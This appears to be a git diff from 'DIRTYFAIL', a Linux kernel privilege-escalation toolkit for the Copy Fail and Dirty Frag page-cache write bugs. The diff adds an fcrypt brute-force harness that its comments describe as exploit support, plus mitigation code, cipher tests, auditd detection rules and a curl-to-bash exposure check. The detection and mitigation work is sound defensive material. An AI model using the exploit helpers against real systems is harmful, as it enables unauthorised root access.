0) + return false; + + /* Vector 2: non-zero key, exercises every byte of the key schedule + * and round-key emit. Pulled from the kernel's crypto/testmgr.h + * fcrypt-pcbc test vector. */ + static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66}; + static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80}; + static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0}; + fcrypt_setkey(&ctx, k2); + fcrypt_decrypt(&ctx, out, c2); + if (memcmp(out, p2, 8) != 0) + return false; + + return true; +} + +/* -------- brute-force harness ------------------------------------------- * + * + * splitmix64 β€” fast, statistically decent generator with no library + * dependency. Plenty for a "scan a 56-bit subspace until I hit a + * predicate" loop. Each call advances the seed and returns a 64-bit + * pseudorandom value, which we treat as the 8-byte candidate key. + */ + +static uint64_t splitmix64(uint64_t *s) +{ + uint64_t z = (*s += 0x9E3779B97F4A7C15ULL); + z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL; + z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL; + return z ^ (z >> 31); +} + +bool fcrypt_brute_force(const uint8_t ciphertext[8], + fcrypt_pred_fn predicate, + uint64_t max_iters, + uint64_t seed, + const char *label, + uint8_t key_out[8], + uint8_t plaintext_out[8]) +{ + fcrypt_ctx ctx; + uint8_t k[8], p[8]; + struct timespec t0, t1; + clock_gettime(CLOCK_MONOTONIC, &t0); + + for (uint64_t i = 0; i < max_iters; i++) { + uint64_t r = splitmix64(&seed); + memcpy(k, &r, 8); + fcrypt_setkey(&ctx, k); + fcrypt_decrypt(&ctx, p, ciphertext); + if (predicate(p)) { + clock_gettime(CLOCK_MONOTONIC, &t1); + double dt = (t1.tv_sec - t0.tv_sec) + + (t1.tv_nsec - t0.tv_nsec) / 1e9; + log_ok("%s found after %llu iters in %.2fs (%.2f Mops/s)", + label, (unsigned long long)i, dt, + (i + 1) / dt / 1e6); + memcpy(key_out, k, 8); + memcpy(plaintext_out, p, 8); + return true; + } + } + + clock_gettime(CLOCK_MONOTONIC, &t1); + double dt = (t1.tv_sec - t0.tv_sec) + + (t1.tv_nsec - t0.tv_nsec) / 1e9; + log_bad("%s exhausted %llu iters in %.2fs without a hit β€” predicate too strict?", + label, (unsigned long long)max_iters, dt); + return false; +} diff --git a/modules/copy_fail_family/fcrypt.h b/modules/copy_fail_family/fcrypt.h new file mode 100644 index 0000000..5a76bc5 --- /dev/null +++ b/modules/copy_fail_family/fcrypt.h @@ -0,0 +1,68 @@ +/* + * DIRTYFAIL β€” fcrypt.h + * + * fcrypt is the Andrew File System (AFS) rxkad cipher: 56-bit key, + * 8-byte block, 16-round Feistel structure with four 256-entry S-boxes. + * It is *deterministic*, with a public algorithm specification β€” its + * key space (2^56) is small enough that targeted decryption can be + * brute-forced in user space at ~15-20 M ops / second on a single core. + * + * That property is what makes the RxRPC variant of Dirty Frag + * (CVE-2026-43500) practical: the in-place 8-byte STORE is + * fcrypt_decrypt(C, K), where C is the ciphertext at the target file + * offset and K is the session key the attacker registers via + * add_key("rxrpc", ...). For each STORE position we want, we run the + * fcrypt brute force locally until we find a K such that the resulting + * 8-byte plaintext matches our predicate (e.g. starts with "::"). + * + * License: see NOTICE.md. The S-box constants are the rxkad protocol + * tables (also present in the Linux kernel's crypto/fcrypt.c, GPL-2.0, + * David Howells / KTH). + */ + +#ifndef DIRTYFAIL_FCRYPT_H +#define DIRTYFAIL_FCRYPT_H + +#include "common.h" + +typedef struct { + uint32_t round_key[16]; /* big-endian, derived in fcrypt_setkey */ +} fcrypt_ctx; + +/* Initialize the global S-box tables. Call once before any other fcrypt_*. */ +void fcrypt_init(void); + +/* Run the kernel test vectors and return true if they match. Use this + * during exploit setup to fail fast on a broken build. */ +bool fcrypt_selftest(void); + +/* Derive the 16 round keys from an 8-byte key (only the high 7 bits of + * each byte are used; bit 0 of each byte is parity in the rxkad token + * format). */ +void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]); + +/* Decrypt a single 8-byte block. */ +void fcrypt_decrypt(const fcrypt_ctx *ctx, + uint8_t out[8], const uint8_t in[8]); + +/* Brute-force search predicate: given an 8-byte candidate plaintext, + * return true if it satisfies the constraints we want at this STORE + * position. */ +typedef bool (*fcrypt_pred_fn)(const uint8_t plaintext[8]); + +/* Search for an 8-byte key K such that fcrypt_decrypt(C, K) satisfies + * `predicate`. Returns true and fills K and the resulting plaintext on + * hit; returns false after `max_iters` non-hits. + * + * `seed` selects the search starting point (deterministic via splitmix64); + * pass time(NULL) for randomness across runs, or a fixed value for + * reproducibility. `label` is logged on hit/timeout for clarity. */ +bool fcrypt_brute_force(const uint8_t ciphertext[8], + fcrypt_pred_fn predicate, + uint64_t max_iters, + uint64_t seed, + const char *label, + uint8_t key_out[8], + uint8_t plaintext_out[8]); + +#endif diff --git a/modules/copy_fail_family/mitigate.c b/modules/copy_fail_family/mitigate.c new file mode 100644 index 0000000..eab4dad --- /dev/null +++ b/modules/copy_fail_family/mitigate.c @@ -0,0 +1,182 @@ +/* + * DIRTYFAIL β€” mitigate.c β€” defensive deployment + * + * See mitigate.h for the design. + */ + +#include "mitigate.h" + +#include +#include +#include + +#define MODPROBE_CONF "/etc/modprobe.d/dirtyfail-mitigations.conf" +#define SYSCTL_CONF "/etc/sysctl.d/99-dirtyfail-mitigations.conf" + +/* Modules to blacklist. Each is the kernel module name + reason. */ +static const struct { + const char *name; + const char *reason; +} BLACKLIST[] = { + {"algif_aead", "Copy Fail (CVE-2026-31431) β€” authencesn page-cache STORE primitive"}, + {"esp4", "Dirty Frag (CVE-2026-43284) β€” xfrm-ESP IPv4 path"}, + {"esp6", "Dirty Frag (CVE-2026-43284) β€” xfrm-ESP IPv6 path"}, + {"rxrpc", "Dirty Frag (CVE-2026-43500) β€” RxRPC pcbc(fcrypt) path"}, + {NULL, NULL}, +}; + +static bool write_file(const char *path, const char *content) +{ + int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644); + if (fd < 0) return false; + size_t n = strlen(content); + ssize_t got = write(fd, content, n); + close(fd); + return got == (ssize_t)n; +} + +static bool require_root(void) +{ + if (geteuid() != 0) { + log_bad("mitigate requires root β€” re-run as `sudo dirtyfail --mitigate`"); + return false; + } + return true; +} + +static int rmmod_if_loaded(const char *name) +{ + /* Try via /sbin/rmmod (system shell). Returns 0 if module wasn't + * loaded or unload succeeded; 1 if unload failed. */ + char cmd[256]; + snprintf(cmd, sizeof(cmd), + "if lsmod | grep -q '^%s '; then " + " rmmod %s 2>/dev/null && echo unloaded || echo \"unload failed (in use?)\"; " + "else " + " echo \"not loaded\"; " + "fi", name, name); + return system(cmd) == 0 ? 0 : 1; +} + +df_result_t mitigate_apply(void) +{ + log_step("DIRTYFAIL β€” defensive mitigation deployment"); + + if (!require_root()) return DF_TEST_ERROR; + + log_warn("about to apply system-wide mitigations:"); + log_warn(" 1. blacklist algif_aead, esp4, esp6, rxrpc via modprobe"); + log_warn(" 2. unload those modules if loaded"); + log_warn(" 3. set kernel.apparmor_restrict_unprivileged_userns=1 (where AA loaded)"); + log_warn(" 4. drop page cache"); + fputc('\n', stderr); + log_warn("SIDE EFFECTS:"); + log_warn(" - blacklisting esp4/esp6 BREAKS IPsec / strongSwan / libreswan VPNs"); + log_warn(" - blacklisting rxrpc BREAKS AFS distributed file system clients"); + log_warn(" - blacklisting algif_aead BREAKS userspace AEAD via AF_ALG (rare)"); + fputc('\n', stderr); + log_warn("undo with `dirtyfail --cleanup-mitigate` (removes config files, leaves modules unloaded)"); + + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + return DF_OK; + } + + /* 1. Write modprobe blacklist */ + char buf[2048]; + char *p = buf; + p += snprintf(p, sizeof(buf) - (p - buf), + "# DIRTYFAIL mitigations β€” blacklist modules that expose the\n" + "# Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284,\n" + "# CVE-2026-43500) page-cache write primitives.\n" + "#\n" + "# Generated by `dirtyfail --mitigate`. Remove with\n" + "# `dirtyfail --cleanup-mitigate` or by deleting this file.\n" + "\n"); + for (int i = 0; BLACKLIST[i].name; i++) { + p += snprintf(p, sizeof(buf) - (p - buf), + "# %s\n" + "install %s /bin/false\n", + BLACKLIST[i].reason, BLACKLIST[i].name); + } + if (!write_file(MODPROBE_CONF, buf)) { + log_bad("failed to write %s: %s", MODPROBE_CONF, strerror(errno)); + return DF_TEST_ERROR; + } + log_ok("wrote %s", MODPROBE_CONF); + + /* 2. Unload currently loaded modules */ + log_step("unloading currently-loaded modules:"); + for (int i = 0; BLACKLIST[i].name; i++) { + printf(" %s: ", BLACKLIST[i].name); + fflush(stdout); + rmmod_if_loaded(BLACKLIST[i].name); + } + + /* 3. Set AppArmor sysctl (only if AA is loaded) */ + int sysctl_fd = open("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", O_WRONLY); + if (sysctl_fd >= 0) { + if (write(sysctl_fd, "1\n", 2) == 2) + log_ok("set apparmor_restrict_unprivileged_userns=1 (runtime)"); + else + log_warn("could not set apparmor_restrict_unprivileged_userns: %s", strerror(errno)); + close(sysctl_fd); + + /* Persist via sysctl.d */ + const char *sysctl_content = + "# DIRTYFAIL mitigations β€” block unprivileged userns capability acquisition.\n" + "# This prevents the xfrm-ESP / RxRPC / GCM exploit infrastructure from\n" + "# obtaining CAP_NET_ADMIN inside a fresh user namespace.\n" + "kernel.apparmor_restrict_unprivileged_userns = 1\n"; + if (write_file(SYSCTL_CONF, sysctl_content)) + log_ok("wrote %s (persists across reboot)", SYSCTL_CONF); + else + log_warn("could not write %s: %s", SYSCTL_CONF, strerror(errno)); + } else { + log_hint("AppArmor sysctl not present (kernel without AA, or AA not loaded) β€” skipping"); + } + + /* 4. Drop page cache */ + int dc = open("/proc/sys/vm/drop_caches", O_WRONLY); + if (dc >= 0) { + ssize_t n = write(dc, "3\n", 2); + close(dc); + if (n == 2) log_ok("dropped page cache"); + } + + fputc('\n', stdout); + log_ok("=== mitigation summary ==="); + log_ok(" modprobe blacklist: %s", MODPROBE_CONF); + log_ok(" sysctl persistence: %s", SYSCTL_CONF); + log_ok(" modules unloaded: algif_aead, esp4, esp6, rxrpc (where loaded)"); + fputc('\n', stdout); + log_hint("Re-verify with `dirtyfail --scan` β€” should now report most modes as"); + log_hint("preconditions missing or mitigated."); + fputc('\n', stdout); + log_hint("Ultimate fix: install kernel update with f4c50a4034e6 backport."); + return DF_OK; +} + +df_result_t mitigate_revert(void) +{ + log_step("DIRTYFAIL β€” revert mitigations"); + if (!require_root()) return DF_TEST_ERROR; + + log_warn("removing %s + %s", MODPROBE_CONF, SYSCTL_CONF); + log_warn("modules will NOT be auto-loaded β€” operator decides if/when"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined"); + return DF_OK; + } + + if (unlink(MODPROBE_CONF) == 0) log_ok("removed %s", MODPROBE_CONF); + else if (errno == ENOENT) log_hint("%s did not exist", MODPROBE_CONF); + else log_bad("unlink %s: %s", MODPROBE_CONF, strerror(errno)); + + if (unlink(SYSCTL_CONF) == 0) log_ok("removed %s", SYSCTL_CONF); + else if (errno == ENOENT) log_hint("%s did not exist", SYSCTL_CONF); + else log_bad("unlink %s: %s", SYSCTL_CONF, strerror(errno)); + + log_hint("modules can be reloaded individually with `sudo modprobe `"); + return DF_OK; +} diff --git a/modules/copy_fail_family/mitigate.h b/modules/copy_fail_family/mitigate.h new file mode 100644 index 0000000..c6b0f46 --- /dev/null +++ b/modules/copy_fail_family/mitigate.h @@ -0,0 +1,46 @@ +/* + * DIRTYFAIL β€” mitigate.h + * + * Defensive companion to the exploit modes: applies all known + * mitigations for Copy Fail / Dirty Frag in one shot. Intended for + * sysadmins who want a fast "fix this until the kernel patch lands" + * deployment. + * + * What `--mitigate` does: + * + * 1. Writes /etc/modprobe.d/dirtyfail-mitigations.conf with + * `install /bin/false` blacklists for: + * - algif_aead (Copy Fail authencesn primitive) + * - esp4 + esp6 (Dirty Frag xfrm-ESP path) + * - rxrpc (Dirty Frag RxRPC path) + * + * 2. rmmods any of those that are currently loaded. + * + * 3. Sets `kernel.apparmor_restrict_unprivileged_userns=1` (where + * AppArmor is loaded). Persists via /etc/sysctl.d/. + * + * 4. Drops the page cache to evict any pre-existing page-cache + * modifications. + * + * 5. Reports what it did so the operator can audit / undo. + * + * Caveats: + * - Requires root. + * - Disabling esp4/esp6 breaks IPsec / strongSwan. + * - Disabling rxrpc breaks AFS clients. + * - These are interim mitigations; the right fix is the kernel patch. + * + * Run with `--cleanup-mitigate` to undo (removes the blacklist conf, + * removes the sysctl conf, but does not unload modules β€” operator + * decides if/when to reload). + */ + +#ifndef DIRTYFAIL_MITIGATE_H +#define DIRTYFAIL_MITIGATE_H + +#include "common.h" + +df_result_t mitigate_apply(void); +df_result_t mitigate_revert(void); + +#endif diff --git a/modules/copy_fail_family/tests/test_aes_ecb.c b/modules/copy_fail_family/tests/test_aes_ecb.c new file mode 100644 index 0000000..ea74077 --- /dev/null +++ b/modules/copy_fail_family/tests/test_aes_ecb.c @@ -0,0 +1,101 @@ +/* + * tests/test_aes_ecb.c + * + * Verifies that the kernel's AF_ALG `ecb(aes)` implementation produces + * the expected outputs for known AES-128-ECB test vectors. This is the + * primitive that copyfail_gcm.c uses to compute GCM keystream byte 0 + * via the J0+1 counter block trick. + * + * If this test passes, the GCM exploit's brute-force loop is sound. + * If it fails, the kernel's AES implementation differs from spec β€” no + * exploit will produce the right STORE values. + * + * Linux-only. Uses the same AF_ALG primitives as copyfail_gcm.c. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +static int failures = 0; + +#define ASSERT(cond, msg, ...) do { \ + if (!(cond)) { fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); failures++; } \ + else { fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); } \ +} while (0) + +static int alg_open_ecb_aes(const unsigned char key[16]) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg sa = { .salg_family = AF_ALG }; + strcpy((char *)sa.salg_type, "skcipher"); + strcpy((char *)sa.salg_name, "ecb(aes)"); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(s); return -1; } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 16) < 0) { close(s); return -1; } + return s; +} + +static int aes_ecb_encrypt(int s, const unsigned char in[16], unsigned char out[16]) +{ + int op = accept(s, NULL, NULL); + if (op < 0) return -1; + char cbuf[CMSG_SPACE(sizeof(int))] = {0}; + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; c->cmsg_type = ALG_SET_OP; c->cmsg_len = CMSG_LEN(sizeof(int)); + *(int *)CMSG_DATA(c) = ALG_OP_ENCRYPT; + struct iovec iov = { .iov_base = (void *)in, .iov_len = 16 }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + if (sendmsg(op, &msg, 0) != 16) { close(op); return -1; } + int n = read(op, out, 16); + close(op); + return n == 16 ? 0 : -1; +} + +int main(void) +{ + /* NIST test vector: AES-128 ECB + * key = 000102030405060708090a0b0c0d0e0f + * pt = 000102030405060708090a0b0c0d0e0f + * ct = 0a940bb5416ef045f1c39458c653ea5a + */ + unsigned char key[16], in[16], out[16]; + for (int i = 0; i < 16; i++) { key[i] = i; in[i] = i; } + static const unsigned char expected[16] = { + 0x0a,0x94,0x0b,0xb5,0x41,0x6e,0xf0,0x45, + 0xf1,0xc3,0x94,0x58,0xc6,0x53,0xea,0x5a + }; + + int s = alg_open_ecb_aes(key); + ASSERT(s >= 0, "AF_ALG skcipher ecb(aes) bindable + keyable"); + if (s < 0) return 1; + + ASSERT(aes_ecb_encrypt(s, in, out) == 0, "single-block ECB encrypt completes"); + + ASSERT(memcmp(out, expected, 16) == 0, + "ECB(K=0..15, P=0..15) = 0a940bb5416ef045f1c39458c653ea5a"); + if (memcmp(out, expected, 16) != 0) { + fprintf(stderr, " got: "); + for (int i = 0; i < 16; i++) fprintf(stderr, "%02x", out[i]); + fprintf(stderr, "\n"); + } + + /* GCM J0+1 counter block sanity: nonce(12) || 0x00000002. byte 0 of + * the encrypted block is the keystream byte that XORs onto plaintext + * byte 0 in GCM. We don't verify against a specific GCM vector here + * (no canonical short test for this), just that the operation runs. */ + unsigned char counter[16]; + memset(counter, 0xab, 12); + counter[12] = 0; counter[13] = 0; counter[14] = 0; counter[15] = 2; + ASSERT(aes_ecb_encrypt(s, counter, out) == 0, + "GCM J0+1 counter block encrypt (keystream byte computation)"); + + close(s); + fprintf(stderr, "\n%d failure(s)\n", failures); + return failures > 0 ? 1 : 0; +} diff --git a/modules/copy_fail_family/tests/test_fcrypt.c b/modules/copy_fail_family/tests/test_fcrypt.c new file mode 100644 index 0000000..ae323bf --- /dev/null +++ b/modules/copy_fail_family/tests/test_fcrypt.c @@ -0,0 +1,84 @@ +/* + * tests/test_fcrypt.c + * + * Selftest for the rxkad fcrypt cipher implementation in src/fcrypt.c. + * Built standalone via `make test`. No DIRTYFAIL runtime needed. + * + * Verifies: + * - All-zero key vector (catches gross structural bugs) + * - Non-zero key vector from kernel testmgr.h (catches subtle bugs + * in 7-bit packing or 11-bit ROR key schedule) + * - Brute-force harness convergence (sanity-checks predicate gating) + */ + +#include "../src/fcrypt.h" +#include "../src/common.h" + +#include +#include +#include +#include + +static int failures = 0; + +#define ASSERT(cond, msg, ...) do { \ + if (!(cond)) { \ + fprintf(stderr, "FAIL: " msg "\n", ##__VA_ARGS__); \ + failures++; \ + } else { \ + fprintf(stderr, " ok: " msg "\n", ##__VA_ARGS__); \ + } \ +} while (0) + +static bool predicate_match_first_byte(const uint8_t p[8]) +{ + return p[0] == 0xAB; +} + +int main(void) +{ + fcrypt_init(); + + /* Selftest covers both vectors. */ + ASSERT(fcrypt_selftest(), + "fcrypt_selftest passes (covers k=0 and k=1144...66 vectors)"); + + /* Spot-check vector 1 directly */ + fcrypt_ctx ctx; + uint8_t out[8]; + static const uint8_t k1[8] = {0,0,0,0,0,0,0,0}; + static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41}; + fcrypt_setkey(&ctx, k1); + fcrypt_decrypt(&ctx, out, c1); + ASSERT(memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) == 0, + "vector 1: decrypt(k=0, ct=0E0900C73EF7ED41) = 0000000000000000"); + + /* Spot-check vector 2 directly */ + static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66}; + static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80}; + static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0}; + fcrypt_setkey(&ctx, k2); + fcrypt_decrypt(&ctx, out, c2); + ASSERT(memcmp(out, p2, 8) == 0, + "vector 2: decrypt(k=11447 7AAD D003 366, ct=D8ED787477EC0680) = 123456789ABCDEF0"); + + /* Brute-force smoke test: search for K such that decrypt(C=0..7) starts with 0xAB. + * Predicate hit rate = 1/256, so ~256 iters expected. Hard cap at 1<<20. */ + uint8_t key_out[8], pt_out[8]; + static const uint8_t test_ct[8] = {0,1,2,3,4,5,6,7}; + bool found = fcrypt_brute_force(test_ct, predicate_match_first_byte, + 1 << 20, (uint64_t)time(NULL), + "smoke", key_out, pt_out); + ASSERT(found, + "brute force converges on first-byte=0xAB predicate within 1M iters"); + if (found) { + /* Verify the discovered key actually produces the claimed plaintext */ + fcrypt_setkey(&ctx, key_out); + fcrypt_decrypt(&ctx, out, test_ct); + ASSERT(memcmp(out, pt_out, 8) == 0 && out[0] == 0xAB, + "discovered key produces claimed plaintext (roundtrip OK)"); + } + + fprintf(stderr, "\n%d failure(s)\n", failures); + return failures > 0 ? 1 : 0; +} diff --git a/modules/copy_fail_family/tools/99-dirtyfail.rules b/modules/copy_fail_family/tools/99-dirtyfail.rules new file mode 100644 index 0000000..9b7159b --- /dev/null +++ b/modules/copy_fail_family/tools/99-dirtyfail.rules @@ -0,0 +1,100 @@ +# DIRTYFAIL β€” auditd detection rules +# +# Drop into /etc/audit/rules.d/, then reload: +# +# sudo install -m 0640 99-dirtyfail.rules /etc/audit/rules.d/ +# sudo augenrules --load +# sudo systemctl restart auditd +# +# These rules generate audit events for the syscalls the DIRTYFAIL +# exploit chain uses. They are intentionally noisy on systems that +# legitimately use rootless containers, IPsec, or AFS β€” review the +# Tuning section before enabling on a production host. +# +# Search recorded events: +# +# sudo ausearch -k dirtyfail-xfrm +# sudo ausearch -k dirtyfail-rxkey +# sudo ausearch -k dirtyfail-userns +# +# Rules MUST stay on single lines β€” auditctl(8) does not honor +# backslash-newline continuations in rule files. +# +# Tested on: Debian 13, Ubuntu 24.04/26.04, AlmaLinux 10, Fedora 44. + +## ----------------------------------------------------------------- ## +## 1. XFRM netlink registration from a non-root account +## +## socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM) is an extremely strong +## signal: legitimate use is "ip xfrm" (root) or `swanctl`/charon (root) +## or networkd (root). An unprivileged account creating this socket +## is the precondition for ESP v4/v6/GCM exploitation. +## +## socket() args: a0=family(16=AF_NETLINK) a2=protocol(6=NETLINK_XFRM) +## auid filter: ignore kernel/system processes (auid=4294967295) +## match interactive logins (auid >= 1000) +## ----------------------------------------------------------------- ## +-a always,exit -F arch=b64 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm +-a always,exit -F arch=b32 -S socket -F a0=16 -F a2=6 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-xfrm + +## ----------------------------------------------------------------- ## +## 2. add_key("rxrpc", ...) β€” RxRPC session-key registration +## +## The rxkad-handshake forgery requires registering a rxrpc-typed key +## via add_key(2). On most servers this should never happen from an +## unprivileged uid; AFS clients that legitimately use this run as +## root or a service account. +## ----------------------------------------------------------------- ## +-a always,exit -F arch=b64 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey +-a always,exit -F arch=b32 -S add_key -F auid>=1000 -F auid!=4294967295 -k dirtyfail-rxkey + +## ----------------------------------------------------------------- ## +## 3. unshare(CLONE_NEWUSER) from interactive accounts +## +## CLONE_NEWUSER == 0x10000000. Every DIRTYFAIL exploit mode does this +## once. WARNING: this fires on every legitimate `unshare -U`, every +## podman/buildah container start, every chrome/firefox sandbox spawn. +## Filter to executions you don't expect, or treat as low-fidelity noise +## that pairs well with the dirtyfail-xfrm key for high-fidelity alerts. +## ----------------------------------------------------------------- ## +-a always,exit -F arch=b64 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns +-a always,exit -F arch=b32 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns + +## ----------------------------------------------------------------- ## +## 4. AF_ALG socket creation β€” Copy Fail / GCM precondition +## +## socket(AF_ALG, ...). a0=38 (PF_ALG). Legitimate uses: cryptsetup, +## kernel-side TLS offload, some QEMU paths. Suspicious from a shell +## account. +## ----------------------------------------------------------------- ## +-a always,exit -F arch=b64 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg +-a always,exit -F arch=b32 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg + +## ----------------------------------------------------------------- ## +## 5. Directly watch /etc/passwd and /etc/shadow for in-place modifications +## +## A successful exploit modifies the page-cache copy (which is what +## PAM reads), but these watches fire when /usr/bin/passwd, vipw, or +## anything else opens these files for writing. Useful as a baseline +## change-detection rule independent of DIRTYFAIL. +## ----------------------------------------------------------------- ## +-w /etc/passwd -p wa -k dirtyfail-passwd-write +-w /etc/shadow -p wa -k dirtyfail-shadow-write + +## ----------------------------------------------------------------- ## +## Tuning notes +## +## - On servers running rootless containers, dirtyfail-userns will be +## high-volume noise. Either drop rule 3, or filter on `comm!=podman` +## etc. for your specific runtime. +## - On IPsec gateways, dirtyfail-xfrm fires for every legitimate SA +## install. Drop the rule or filter `comm` to your VPN daemon. +## - Pair dirtyfail-userns + dirtyfail-xfrm with a SIEM correlation +## rule: "same auid emits both within 5 seconds" β†’ high-confidence +## exploit-attempt alert. +## +## Note: the AppArmor `change_onexec` rule that an earlier draft +## included is omitted β€” auditctl won't reliably match writes to +## /proc/self/attr/exec via -F path because the path is per-pid. +## Use the userns + xfrm pair instead for the bypass-detection signal. +## ----------------------------------------------------------------- ## diff --git a/modules/copy_fail_family/tools/dirtyfail-check.sh b/modules/copy_fail_family/tools/dirtyfail-check.sh new file mode 100755 index 0000000..9ba849c --- /dev/null +++ b/modules/copy_fail_family/tools/dirtyfail-check.sh @@ -0,0 +1,181 @@ +#!/bin/bash +# +# dirtyfail-check.sh β€” defensive precondition probe for sysadmins +# +# A standalone bash script that reports whether this Linux host is +# exposed to Copy Fail (CVE-2026-31431) or Dirty Frag (CVE-2026-43284, +# CVE-2026-43500) exploitation by an unprivileged user. +# +# Does NOT require building DIRTYFAIL. Read-only β€” does not modify +# the system. Safe to run on production. Does not require root, but +# some checks are more accurate when run as root (kernel module +# inspection, sysctl reads). +# +# Usage: +# bash dirtyfail-check.sh +# # or pipe directly: +# curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh | bash +# +# Exit codes: +# 0 = host is mitigated (kernel patched OR LSM blocks unprivileged path) +# 1 = host is VULNERABLE to at least one exploit path +# 2 = check error (couldn't determine state) + +set -u + +# ANSI colors only when stdout is a tty +if [ -t 1 ]; then + RED='\033[1;31m'; YEL='\033[1;33m'; GRN='\033[1;32m'; CYN='\033[1;36m'; OFF='\033[0m' +else + RED=''; YEL=''; GRN=''; CYN=''; OFF='' +fi + +bad() { printf "${RED}[!]${OFF} %s\n" "$*"; } +warn() { printf "${YEL}[~]${OFF} %s\n" "$*"; } +ok() { printf "${GRN}[+]${OFF} %s\n" "$*"; } +info() { printf "${CYN}[*]${OFF} %s\n" "$*"; } + +# ============================================================ +# 1. Kernel version +# ============================================================ +KVER=$(uname -r) +KMAJ=$(echo "$KVER" | cut -d. -f1) +KMIN=$(echo "$KVER" | cut -d. -f2) +info "kernel: $KVER ($(uname -m))" + +# Affected kernel window per the CVEs: +# xfrm-ESP no-COW path: introduced 2017 (cac2661c53f3), fixed mainline +# f4c50a4034e6 (2026-05-07). +# algif_aead/authencesn: introduced 2017 (72548b093ee3), fixed +# mainline a664bf3d. +# rxkad page-cache write: introduced 2023-06 (2dc334f1a63a), no +# mainline patch yet at time of writing. +# Kernels 4.10 .. ~6.20 are within the broad window; older kernels +# may also be affected depending on backports. +if [ "$KMAJ" -lt 4 ] || { [ "$KMAJ" -eq 4 ] && [ "$KMIN" -lt 10 ]; }; then + ok "kernel predates CVE introduction (cac2661c53f3, 2017-01)" + NOT_IN_WINDOW=1 +else + info "kernel within affected window β€” checking other preconditions" + NOT_IN_WINDOW=0 +fi + +# ============================================================ +# 2. Module presence + blacklist +# ============================================================ +MODS_VULNERABLE=0 +MODS_BLACKLISTED=0 +echo "" +info "module status:" +for m in algif_aead authencesn esp4 esp6 rxrpc; do + if modinfo "$m" >/dev/null 2>&1; then + if grep -rqE "^\s*install\s+$m\s+/bin/false" /etc/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then + ok " $m: blacklisted in modprobe.d (mitigated)" + MODS_BLACKLISTED=$((MODS_BLACKLISTED + 1)) + elif lsmod | grep -q "^$m\b"; then + warn " $m: loaded β€” exposes the primitive" + MODS_VULNERABLE=$((MODS_VULNERABLE + 1)) + else + warn " $m: present on disk, autoloads on use β€” exposes the primitive" + MODS_VULNERABLE=$((MODS_VULNERABLE + 1)) + fi + else + ok " $m: not on disk (kernel build doesn't ship it)" + fi +done + +# ============================================================ +# 3. LSM / userns hardening +# ============================================================ +echo "" +info "LSM / userns hardening:" + +LSM_BLOCKS=0 +if [ -r /proc/sys/kernel/apparmor_restrict_unprivileged_userns ]; then + AA=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null) + if [ "$AA" = "1" ]; then + ok " apparmor_restrict_unprivileged_userns=1 (Ubuntu-style hardening active)" + # Confirm caps are actually blocked via empirical probe + ( unshare -U bash -c 'echo deny > /proc/self/setgroups 2>/dev/null && exit 0 || exit 1' ) 2>/dev/null + if [ $? -ne 0 ]; then + ok " empirical probe: unprivileged userns has no CAP_SYS_ADMIN β€” exploit infrastructure blocked" + LSM_BLOCKS=1 + else + warn " empirical probe: caps survived unshare β€” sysctl set but enforcement may be off" + fi + else + info " apparmor_restrict_unprivileged_userns=$AA (not enforcing)" + fi +else + info " no AppArmor userns sysctl (kernel without AA, or AA not loaded)" +fi + +if command -v getenforce >/dev/null; then + SE=$(getenforce 2>/dev/null) + info " SELinux: $SE" +fi + +if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then + UU=$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null) + if [ "$UU" = "0" ]; then + ok " unprivileged_userns_clone=0 (userns creation blocked entirely)" + LSM_BLOCKS=1 + fi +fi + +# ============================================================ +# 4. PAM nullok (gates the rxrpc + backdoor β†’ root step) +# ============================================================ +echo "" +info "PAM configuration (gates rxrpc/backdoor β†’ real root):" +PAM_NULLOK=0 +if grep -rqE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null; then + warn " pam_unix nullok present β€” empty-password accounts can su to root" + PAM_NULLOK=1 + grep -lE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null | sed 's/^/ /' +else + ok 